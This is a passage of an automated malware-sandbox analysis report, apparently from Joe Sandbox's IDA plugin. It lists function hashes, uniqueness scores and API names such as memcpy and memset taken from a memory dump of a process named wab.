                                                                                  • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                  • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                                  • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                  • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy
                                                                                  • String ID:
                                                                                  • API String ID: 3510742995-0
                                                                                  • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                  • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                                  • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                  • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001B.00000002.1914155015.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_27_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??2@$memset
                                                                                  • String ID:
                                                                                  • API String ID: 1860491036-0
                                                                                  • Opcode ID: c78329486846fe93a7256add11836ddf78ca18624f4c1b8479d66424083257ec
                                                                                  • Instruction ID: ded700a689dc4ea077b1bf28e8ae47d2b9e76a7afd7a7e1dd26f08861e755b16
                                                                                  • Opcode Fuzzy Hash: c78329486846fe93a7256add11836ddf78ca18624f4c1b8479d66424083257ec
                                                                                  • Instruction Fuzzy Hash: 0B21B6B0A547508EE7558F6A9845A16FAE4FFD0710726C8AFD109DB2B2E7B8D8408F14
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%